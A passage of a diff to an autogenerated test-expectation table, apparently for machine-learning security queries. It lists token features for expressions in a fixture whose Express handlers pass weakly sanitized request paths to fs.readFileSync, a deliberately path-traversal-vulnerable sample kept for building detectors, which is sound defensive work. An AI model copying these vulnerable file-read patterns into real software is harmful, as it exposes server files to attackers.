replace /%20/g pathModule isAbsolute path fs readFileSync path path path replace /\\.\\./g fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:227:19:227:28 | isAbsolute | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:227:19:227:28 | isAbsolute | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:228:5:228:6 | fs | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:228:5:228:6 | fs | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:228:5:228:6 | fs | enclosingFunctionBody | req res path pathModule normalize req query path replace /%20/g pathModule isAbsolute path fs readFileSync path path path replace /\\.\\./g fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:228:5:228:6 | fs | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:228:5:228:6 | fs | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:228:5:228:19 | fs.readFileSync | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:228:5:228:19 | fs.readFileSync | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:228:5:228:19 | fs.readFileSync | enclosingFunctionBody | req res path pathModule normalize req query path replace /%20/g pathModule isAbsolute path fs readFileSync path path path replace /\\.\\./g fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:228:5:228:19 | fs.readFileSync | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:228:5:228:19 | fs.readFileSync | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:228:5:228:25 | exceptional return of fs.read ... c(path) | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:228:5:228:25 | exceptional return of fs.read ... c(path) | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/normalizedPaths.js:228:5:228:25 | exceptional return of fs.read ... c(path) | enclosingFunctionBody | req res path pathModule normalize req query path replace /%20/g pathModule isAbsolute path fs readFileSync path path path replace /\\.\\./g fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:228:5:228:25 | exceptional return of fs.read ... c(path) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:228:5:228:25 | exceptional return of fs.read ... c(path) | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:228:5:228:25 | fs.read ... c(path) | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:228:5:228:25 | fs.read ... c(path) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:228:5:228:25 | fs.read ... c(path) | enclosingFunctionBody | req res path pathModule normalize req query path replace /%20/g pathModule isAbsolute path fs readFileSync path path path replace /\\.\\./g fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:228:5:228:25 | fs.read ... c(path) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:228:5:228:25 | fs.read ... c(path) | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:228:8:228:19 | readFileSync | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:228:8:228:19 | readFileSync | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:228:8:228:19 | readFileSync | enclosingFunctionBody | req res path pathModule normalize req query path replace /%20/g pathModule isAbsolute path fs readFileSync path path path replace /\\.\\./g fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:228:8:228:19 | readFileSync | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:228:8:228:19 | readFileSync | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | | autogenerated/TaintedPath/normalizedPaths.js:228:21:228:24 | path | CalleeFlexibleAccessPath | fs.readFileSync | | autogenerated/TaintedPath/normalizedPaths.js:228:21:228:24 | path | InputArgumentIndex | 0 | | autogenerated/TaintedPath/normalizedPaths.js:228:21:228:24 | path | calleeImports | fs | @@ -8783,11 +75489,46 @@ tokenFeatures | autogenerated/TaintedPath/normalizedPaths.js:228:21:228:24 | path | enclosingFunctionName | app.get#functionalargument | | autogenerated/TaintedPath/normalizedPaths.js:228:21:228:24 | path | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | | autogenerated/TaintedPath/normalizedPaths.js:228:21:228:24 | path | receiverName | fs | +| autogenerated/TaintedPath/normalizedPaths.js:230:5:230:8 | path | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:230:5:230:8 | path | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:230:5:230:8 | path | enclosingFunctionBody | req res path pathModule normalize req query path replace /%20/g pathModule isAbsolute path fs readFileSync path path path replace /\\.\\./g fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:230:5:230:8 | path | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:230:5:230:8 | path | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:230:5:230:36 | path | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:230:5:230:36 | path | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/normalizedPaths.js:230:5:230:36 | path | enclosingFunctionBody | req res path pathModule normalize req query path replace /%20/g pathModule isAbsolute path fs readFileSync path path path replace /\\.\\./g fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:230:5:230:36 | path | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:230:5:230:36 | path | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:230:5:230:36 | path = ... /g, '') | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:230:5:230:36 | path = ... /g, '') | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:230:5:230:36 | path = ... /g, '') | enclosingFunctionBody | req res path pathModule normalize req query path replace /%20/g pathModule isAbsolute path fs readFileSync path path path replace /\\.\\./g fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:230:5:230:36 | path = ... /g, '') | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:230:5:230:36 | path = ... /g, '') | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:230:12:230:15 | path | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:230:12:230:15 | path | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:230:12:230:15 | path | enclosingFunctionBody | req res path pathModule normalize req query path replace /%20/g pathModule isAbsolute path fs readFileSync path path path replace /\\.\\./g fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:230:12:230:15 | path | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:230:12:230:15 | path | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:230:12:230:23 | path.replace | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:230:12:230:23 | path.replace | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:230:12:230:23 | path.replace | enclosingFunctionBody | req res path pathModule normalize req query path replace /%20/g pathModule isAbsolute path fs readFileSync path path path replace /\\.\\./g fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:230:12:230:23 | path.replace | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:230:12:230:23 | path.replace | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:230:12:230:36 | exceptional return of path.re ... /g, '') | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:230:12:230:36 | exceptional return of path.re ... /g, '') | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/normalizedPaths.js:230:12:230:36 | exceptional return of path.re ... /g, '') | enclosingFunctionBody | req res path pathModule normalize req query path replace /%20/g pathModule isAbsolute path fs readFileSync path path path replace /\\.\\./g fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:230:12:230:36 | exceptional return of path.re ... /g, '') | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:230:12:230:36 | exceptional return of path.re ... /g, '') | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | | autogenerated/TaintedPath/normalizedPaths.js:230:12:230:36 | path.re ... /g, '') | contextFunctionInterfaces | allowPath(requestPath, rootPath) | | autogenerated/TaintedPath/normalizedPaths.js:230:12:230:36 | path.re ... /g, '') | contextSurroundingFunctionParameters | (req, res) | | autogenerated/TaintedPath/normalizedPaths.js:230:12:230:36 | path.re ... /g, '') | enclosingFunctionBody | req res path pathModule normalize req query path replace /%20/g pathModule isAbsolute path fs readFileSync path path path replace /\\.\\./g fs readFileSync path | | autogenerated/TaintedPath/normalizedPaths.js:230:12:230:36 | path.re ... /g, '') | enclosingFunctionName | app.get#functionalargument | | autogenerated/TaintedPath/normalizedPaths.js:230:12:230:36 | path.re ... /g, '') | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:230:17:230:23 | replace | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:230:17:230:23 | replace | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:230:17:230:23 | replace | enclosingFunctionBody | req res path pathModule normalize req query path replace /%20/g pathModule isAbsolute path fs readFileSync path path path replace /\\.\\./g fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:230:17:230:23 | replace | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:230:17:230:23 | replace | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | | autogenerated/TaintedPath/normalizedPaths.js:230:25:230:31 | /\\.\\./g | CalleeFlexibleAccessPath | path.replace | | autogenerated/TaintedPath/normalizedPaths.js:230:25:230:31 | /\\.\\./g | InputArgumentIndex | 0 | | autogenerated/TaintedPath/normalizedPaths.js:230:25:230:31 | /\\.\\./g | calleeImports | path | @@ -8806,6 +75547,31 @@ tokenFeatures | autogenerated/TaintedPath/normalizedPaths.js:230:34:230:35 | '' | enclosingFunctionName | app.get#functionalargument | | autogenerated/TaintedPath/normalizedPaths.js:230:34:230:35 | '' | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | | autogenerated/TaintedPath/normalizedPaths.js:230:34:230:35 | '' | receiverName | path | +| autogenerated/TaintedPath/normalizedPaths.js:231:5:231:6 | fs | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:231:5:231:6 | fs | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:231:5:231:6 | fs | enclosingFunctionBody | req res path pathModule normalize req query path replace /%20/g pathModule isAbsolute path fs readFileSync path path path replace /\\.\\./g fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:231:5:231:6 | fs | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:231:5:231:6 | fs | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:231:5:231:19 | fs.readFileSync | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:231:5:231:19 | fs.readFileSync | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:231:5:231:19 | fs.readFileSync | enclosingFunctionBody | req res path pathModule normalize req query path replace /%20/g pathModule isAbsolute path fs readFileSync path path path replace /\\.\\./g fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:231:5:231:19 | fs.readFileSync | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:231:5:231:19 | fs.readFileSync | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:231:5:231:25 | exceptional return of fs.read ... c(path) | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:231:5:231:25 | exceptional return of fs.read ... c(path) | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/normalizedPaths.js:231:5:231:25 | exceptional return of fs.read ... c(path) | enclosingFunctionBody | req res path pathModule normalize req query path replace /%20/g pathModule isAbsolute path fs readFileSync path path path replace /\\.\\./g fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:231:5:231:25 | exceptional return of fs.read ... c(path) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:231:5:231:25 | exceptional return of fs.read ... c(path) | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:231:5:231:25 | fs.read ... c(path) | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:231:5:231:25 | fs.read ... c(path) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:231:5:231:25 | fs.read ... c(path) | enclosingFunctionBody | req res path pathModule normalize req query path replace /%20/g pathModule isAbsolute path fs readFileSync path path path replace /\\.\\./g fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:231:5:231:25 | fs.read ... c(path) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:231:5:231:25 | fs.read ... c(path) | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:231:8:231:19 | readFileSync | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:231:8:231:19 | readFileSync | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:231:8:231:19 | readFileSync | enclosingFunctionBody | req res path pathModule normalize req query path replace /%20/g pathModule isAbsolute path fs readFileSync path path path replace /\\.\\./g fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:231:8:231:19 | readFileSync | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:231:8:231:19 | readFileSync | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | | autogenerated/TaintedPath/normalizedPaths.js:231:21:231:24 | path | CalleeFlexibleAccessPath | fs.readFileSync | | autogenerated/TaintedPath/normalizedPaths.js:231:21:231:24 | path | InputArgumentIndex | 0 | | autogenerated/TaintedPath/normalizedPaths.js:231:21:231:24 | path | calleeImports | fs | @@ -8815,6 +75581,21 @@ tokenFeatures | autogenerated/TaintedPath/normalizedPaths.js:231:21:231:24 | path | enclosingFunctionName | app.get#functionalargument | | autogenerated/TaintedPath/normalizedPaths.js:231:21:231:24 | path | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | | autogenerated/TaintedPath/normalizedPaths.js:231:21:231:24 | path | receiverName | fs | +| autogenerated/TaintedPath/normalizedPaths.js:235:1:235:3 | app | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:235:1:235:3 | app | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/normalizedPaths.js:235:1:235:3 | app | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:235:1:235:7 | app.get | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:235:1:235:7 | app.get | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/normalizedPaths.js:235:1:235:7 | app.get | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:235:1:251:2 | app.get ... rity\\n}) | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:235:1:251:2 | app.get ... rity\\n}) | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/normalizedPaths.js:235:1:251:2 | app.get ... rity\\n}) | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:235:1:251:2 | exceptional return of app.get ... rity\\n}) | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:235:1:251:2 | exceptional return of app.get ... rity\\n}) | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/normalizedPaths.js:235:1:251:2 | exceptional return of app.get ... rity\\n}) | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:235:5:235:7 | get | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:235:5:235:7 | get | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/normalizedPaths.js:235:5:235:7 | get | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | | autogenerated/TaintedPath/normalizedPaths.js:235:9:235:23 | '/resolve-path' | CalleeFlexibleAccessPath | app.get | | autogenerated/TaintedPath/normalizedPaths.js:235:9:235:23 | '/resolve-path' | InputArgumentIndex | 0 | | autogenerated/TaintedPath/normalizedPaths.js:235:9:235:23 | '/resolve-path' | calleeImports | express | @@ -8822,6 +75603,21 @@ tokenFeatures | autogenerated/TaintedPath/normalizedPaths.js:235:9:235:23 | '/resolve-path' | contextSurroundingFunctionParameters | | | autogenerated/TaintedPath/normalizedPaths.js:235:9:235:23 | '/resolve-path' | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | | autogenerated/TaintedPath/normalizedPaths.js:235:9:235:23 | '/resolve-path' | receiverName | app | +| autogenerated/TaintedPath/normalizedPaths.js:235:26:235:25 | fs | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:235:26:235:25 | fs | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/normalizedPaths.js:235:26:235:25 | fs | enclosingFunctionBody | req res path pathModule resolve req query path fs readFileSync path self something path substring 0 self dir length self dir fs readFileSync path fs readFileSync path path slice 0 self dir length self dir fs readFileSync path fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:235:26:235:25 | fs | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:235:26:235:25 | fs | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:235:26:235:25 | pathModule | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:235:26:235:25 | pathModule | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/normalizedPaths.js:235:26:235:25 | pathModule | enclosingFunctionBody | req res path pathModule resolve req query path fs readFileSync path self something path substring 0 self dir length self dir fs readFileSync path fs readFileSync path path slice 0 self dir length self dir fs readFileSync path fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:235:26:235:25 | pathModule | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:235:26:235:25 | pathModule | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:235:26:251:1 | 'arguments' object of anonymous function | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:235:26:251:1 | 'arguments' object of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/normalizedPaths.js:235:26:251:1 | 'arguments' object of anonymous function | enclosingFunctionBody | req res path pathModule resolve req query path fs readFileSync path self something path substring 0 self dir length self dir fs readFileSync path fs readFileSync path path slice 0 self dir length self dir fs readFileSync path fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:235:26:251:1 | 'arguments' object of anonymous function | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:235:26:251:1 | 'arguments' object of anonymous function | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | | autogenerated/TaintedPath/normalizedPaths.js:235:26:251:1 | (req, r ... arity\\n} | CalleeFlexibleAccessPath | app.get | | autogenerated/TaintedPath/normalizedPaths.js:235:26:251:1 | (req, r ... arity\\n} | InputArgumentIndex | 1 | | autogenerated/TaintedPath/normalizedPaths.js:235:26:251:1 | (req, r ... arity\\n} | calleeImports | express | @@ -8829,11 +75625,81 @@ tokenFeatures | autogenerated/TaintedPath/normalizedPaths.js:235:26:251:1 | (req, r ... arity\\n} | contextSurroundingFunctionParameters | (req, res) | | autogenerated/TaintedPath/normalizedPaths.js:235:26:251:1 | (req, r ... arity\\n} | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | | autogenerated/TaintedPath/normalizedPaths.js:235:26:251:1 | (req, r ... arity\\n} | receiverName | app | +| autogenerated/TaintedPath/normalizedPaths.js:235:26:251:1 | exceptional return of anonymous function | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:235:26:251:1 | exceptional return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/normalizedPaths.js:235:26:251:1 | exceptional return of anonymous function | enclosingFunctionBody | req res path pathModule resolve req query path fs readFileSync path self something path substring 0 self dir length self dir fs readFileSync path fs readFileSync path path slice 0 self dir length self dir fs readFileSync path fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:235:26:251:1 | exceptional return of anonymous function | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:235:26:251:1 | exceptional return of anonymous function | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:235:26:251:1 | return of anonymous function | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:235:26:251:1 | return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/normalizedPaths.js:235:26:251:1 | return of anonymous function | enclosingFunctionBody | req res path pathModule resolve req query path fs readFileSync path self something path substring 0 self dir length self dir fs readFileSync path fs readFileSync path path slice 0 self dir length self dir fs readFileSync path fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:235:26:251:1 | return of anonymous function | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:235:26:251:1 | return of anonymous function | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:235:27:235:29 | req | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:235:27:235:29 | req | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:235:27:235:29 | req | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/normalizedPaths.js:235:27:235:29 | req | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:235:27:235:29 | req | enclosingFunctionBody | req res path pathModule resolve req query path fs readFileSync path self something path substring 0 self dir length self dir fs readFileSync path fs readFileSync path path slice 0 self dir length self dir fs readFileSync path fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:235:27:235:29 | req | enclosingFunctionBody | req res path pathModule resolve req query path fs readFileSync path self something path substring 0 self dir length self dir fs readFileSync path fs readFileSync path path slice 0 self dir length self dir fs readFileSync path fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:235:27:235:29 | req | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:235:27:235:29 | req | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:235:27:235:29 | req | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:235:27:235:29 | req | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:235:32:235:34 | res | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:235:32:235:34 | res | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:235:32:235:34 | res | enclosingFunctionBody | req res path pathModule resolve req query path fs readFileSync path self something path substring 0 self dir length self dir fs readFileSync path fs readFileSync path path slice 0 self dir length self dir fs readFileSync path fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:235:32:235:34 | res | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:235:32:235:34 | res | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:236:7:236:10 | path | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:236:7:236:10 | path | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:236:7:236:10 | path | enclosingFunctionBody | req res path pathModule resolve req query path fs readFileSync path self something path substring 0 self dir length self dir fs readFileSync path fs readFileSync path path slice 0 self dir length self dir fs readFileSync path fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:236:7:236:10 | path | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:236:7:236:10 | path | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:236:7:236:47 | path | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:236:7:236:47 | path | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/normalizedPaths.js:236:7:236:47 | path | enclosingFunctionBody | req res path pathModule resolve req query path fs readFileSync path self something path substring 0 self dir length self dir fs readFileSync path fs readFileSync path path slice 0 self dir length self dir fs readFileSync path fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:236:7:236:47 | path | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:236:7:236:47 | path | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:236:7:236:47 | path = ... y.path) | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:236:7:236:47 | path = ... y.path) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:236:7:236:47 | path = ... y.path) | enclosingFunctionBody | req res path pathModule resolve req query path fs readFileSync path self something path substring 0 self dir length self dir fs readFileSync path fs readFileSync path path slice 0 self dir length self dir fs readFileSync path fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:236:7:236:47 | path = ... y.path) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:236:7:236:47 | path = ... y.path) | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:236:14:236:23 | pathModule | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:236:14:236:23 | pathModule | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:236:14:236:23 | pathModule | enclosingFunctionBody | req res path pathModule resolve req query path fs readFileSync path self something path substring 0 self dir length self dir fs readFileSync path fs readFileSync path path slice 0 self dir length self dir fs readFileSync path fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:236:14:236:23 | pathModule | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:236:14:236:23 | pathModule | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:236:14:236:31 | pathModule.resolve | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:236:14:236:31 | pathModule.resolve | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:236:14:236:31 | pathModule.resolve | enclosingFunctionBody | req res path pathModule resolve req query path fs readFileSync path self something path substring 0 self dir length self dir fs readFileSync path fs readFileSync path path slice 0 self dir length self dir fs readFileSync path fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:236:14:236:31 | pathModule.resolve | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:236:14:236:31 | pathModule.resolve | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:236:14:236:47 | exceptional return of pathMod ... y.path) | contextFunctionInterfaces | 